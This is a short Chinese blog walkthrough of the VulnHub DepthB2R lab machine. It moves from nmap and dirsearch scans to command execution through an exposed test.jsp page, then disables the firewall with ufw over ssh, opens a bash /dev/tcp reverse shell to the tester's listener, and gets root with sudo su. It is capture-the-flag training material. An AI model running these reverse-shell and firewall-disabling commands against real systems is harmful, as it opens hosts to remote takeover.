DepthB2R靶场实战【超详细】

下载地址:https://download.vulnhub.com/depth/DepthB2R.ova

一、主机探测与端口扫描

nmap 192.168.121.0/24

 发现开启了8080端口

我们对该端口进行扫描

nmap 192.168.121.187 -p- -A -Pn -sV

 访问其8080web服务

二、get shell

目录扫描

dirsearch -u http://192.168.121.187:8080

 有一个test.jsp,我们访问它

 提示我们可以输入命令

输入ls -la /home,发现root 和bill用户

ls -la /home

我们尝试反弹shell

bash -i >& /dev/tcp/192.168.121.171/4444 0>&1

反弹未能成功,我们看一下进程

ps aux

 发现ssh服务开放,之前端口扫描没扫到,可能是开了防火墙

查看/etc下,防火墙是存在的

ls -la /etc

 

我们尝试关闭防火墙

ssh bill@localhost sudo ufw disable

再次尝试反弹

ssh bill@localhost bash -i >& /dev/tcp/192.168.121.171/4444 0>&1

kali开启监听,成功反弹shell

 三、提权

sudo -l

sudo -l查看具有sudo权限的命令程序

显示所有用户,直接sudo su

sudo su

成功提权

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值